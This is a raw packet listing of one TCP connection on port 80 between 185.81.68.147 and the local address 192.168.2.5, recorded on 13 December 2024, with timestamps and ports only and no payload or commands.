Dec 13, 2024 01:37:10.885663986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.885731936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.886445045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.886555910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.886624098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.887387037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.887516022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.887586117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.888274908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.888395071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.888459921 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.889167070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.889271975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.889338970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.890084982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.890209913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.890273094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.891012907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.891127110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.891202927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.891908884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.892040014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.892107964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.892842054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.892951965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.893017054 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.893727064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.893852949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.893922091 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.894668102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.894782066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.894849062 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.895540953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.895663023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.895733118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.896436930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.896569967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.896635056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.897356033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.897485971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.897552967 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.898269892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.898403883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.898478031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.899193048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.899300098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.899365902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.900104046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.900230885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.900300026 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.900990963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.901143074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.901211023 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.901905060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.902031898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.902096987 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.902828932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.902951002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.903019905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.903754950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.903886080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.903959990 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.904644966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.904753923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.904819965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.905550003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.905642033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.905709028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.906455040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.906569004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.906641960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.907383919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.907490969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.907560110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.908301115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.908413887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.908494949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.909177065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.909293890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.909359932 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.910093069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.910211086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.910274982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.911007881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.911118031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.911186934 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.911933899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.912050962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.912122965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.912821054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.912942886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.913006067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.913748026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.913883924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.913949966 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.914673090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.914781094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.914846897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.915560961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.915744066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.915812016 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.916476011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.916655064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.916723967 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.917375088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.917511940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.917577982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.918281078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.918401003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.918467999 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.919204950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.919328928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.919393063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.920111895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.920293093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.920357943 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.921149015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.921216011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.921292067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.921921968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.922055006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.922120094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.922831059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.922934055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.922998905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.923744917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.923809052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.923875093 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.924612999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.973407984 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.068856955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.068909883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.069005013 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.069302082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.069361925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.069453001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.070219040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.070319891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.070408106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.071113110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.071290016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.071377039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.072029114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.072133064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.072220087 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.072916985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.073054075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.073133945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.073857069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.074048996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.074131012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.074759007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.074879885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.074959993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.075663090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.075793028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.075874090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.076560020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.076673031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.076756954 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.077480078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.077603102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.077682972 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.078391075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.078470945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.078547001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.079291105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.079416037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.079494953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.080204964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.080312014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.080391884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.081109047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.081265926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.081345081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.082025051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.082128048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.082214117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.082925081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.083031893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.083112955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.083832979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.083940029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.084022999 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.084749937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.084866047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.084944010 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.085669041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.085817099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.085896015 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.086563110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.086946011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.087023020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.087470055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.087574959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.087661028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.088390112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.088502884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.088577986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.089303970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.089411974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.089499950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.090203047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.090307951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.090387106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.091154099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.091253996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.091334105 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.092091084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.092185020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.092264891 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.092943907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.093081951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.093159914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.093854904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.094002008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.094072104 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.094755888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.094855070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.094938993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.095671892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.095767975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.095848083 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.096570969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.096698999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.096781015 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.097485065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.097630978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.097708941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.098380089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.098531961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.098609924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.099291086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.099406958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.099486113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.100225925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.100320101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.100402117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.101133108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.101246119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.101329088 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.102050066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.102133989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.102219105 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.102931023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.103041887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.103121996 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.103852987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.103939056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.104012012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.104749918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.104862928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.104949951 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.105655909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.105760098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.105839014 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.106563091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.106688976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.106769085 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.107481956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.107595921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.107665062 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.108386993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.108498096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.108573914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.109350920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.109441996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.109517097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.110213041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.110317945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.110395908 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.111129999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.111275911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.111341953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.112036943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.112169981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.112240076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.112947941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.113059998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.113137960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.113867044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.113989115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.114074945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.114763021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.114873886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.114957094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.115679979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.115824938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.115901947 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.116548061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.160995007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.260776043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.260859966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.260946989 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.261255026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.261354923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.261399031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.262132883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.262269974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.262315035 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.263060093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.263237953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.263283968 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.263936043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.263992071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.264034033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.264842033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.264956951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.265031099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.265758991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.265906096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.265980005 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.266673088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.266787052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.266866922 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.267601967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.267690897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.267759085 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.268507004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.268657923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.268721104 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.269413948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.269503117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.269572020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.270334959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.270464897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.270529985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.271229029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.271379948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.271449089 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.272193909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.272432089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.272504091 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.273121119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.273179054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.273261070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.273953915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.274101973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:11.274174929 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:11.274858952 CET	80	49707	185.81.68.147	192.168.2.5
